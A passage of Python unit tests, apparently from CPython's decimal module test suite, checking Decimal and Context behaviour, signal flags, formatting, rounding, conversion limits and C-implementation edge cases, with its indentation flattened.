self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
FloatOperation = C.FloatOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
FloatOperation: C.DecFloatOperation,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
def test_maxcontext_exact_arith(self):
# Make sure that exact operations do not raise MemoryError due
# to huge intermediate values when the context precision is very
# large.
# The following functions fill the available precision and are
# therefore not suitable for large precisions (by design of the
# specification).
MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
'logical_and', 'logical_or', 'logical_xor',
'next_toward', 'rotate', 'shift']
Decimal = C.Decimal
Context = C.Context
localcontext = C.localcontext
# Here only some functions that are likely candidates for triggering a
# MemoryError are tested. deccheck.py has an exhaustive test.
maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
with localcontext(maxcontext):
self.assertEqual(Decimal(0).exp(), 1)
self.assertEqual(Decimal(1).ln(), 0)
self.assertEqual(Decimal(1).log10(), 0)
self.assertEqual(Decimal(10**2).log10(), 2)
self.assertEqual(Decimal(10**223).log10(), 223)
self.assertEqual(Decimal(10**19).logb(), 19)
self.assertEqual(Decimal(4).sqrt(), 2)
